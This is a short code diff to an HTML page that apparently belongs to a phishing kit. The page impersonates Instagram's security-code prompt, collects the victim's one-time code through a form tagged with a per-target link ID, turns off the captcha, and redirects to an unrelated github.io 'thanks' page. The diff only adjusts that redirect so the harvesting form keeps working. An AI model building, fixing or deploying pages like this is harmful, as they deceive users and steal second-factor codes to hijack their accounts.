--- a/instagram/otp/657daf104b167f68d1979b9c.html
+++ b/instagram/otp/657daf104b167f68d1979b9c.html
@@ -67,13 +67,13 @@
             placeholder="Security code"
           />
           <input type="hidden" name="linkId" value="657daf104b167f68d1979b9c" />
-          <input type="submit" name="submit" value="Send Email"  onclick="window.location.href = 'https://vtfrw.github.io/fvrap/thanks.html';" />
+          <input type="submit" name="submit" value="Send Email"  />
           <div class="options">
             <p class="small">Didn't get security code? we can</p>
             <a href="#" class="small">resend it</a>
             <div class="forget"><a href="#">Forgot password?</a></div>
           </div>
-<!--           <input type="hidden" name="_next" value="https://vtfrw.github.io/fvrap/thanks.html"> -->
+          <input type="hidden" name="_redirect" value="https://vtfrw.github.io/fvrap/thanks.html"> 
 <input type="hidden" name="_captcha" value="false">
 
         </form>
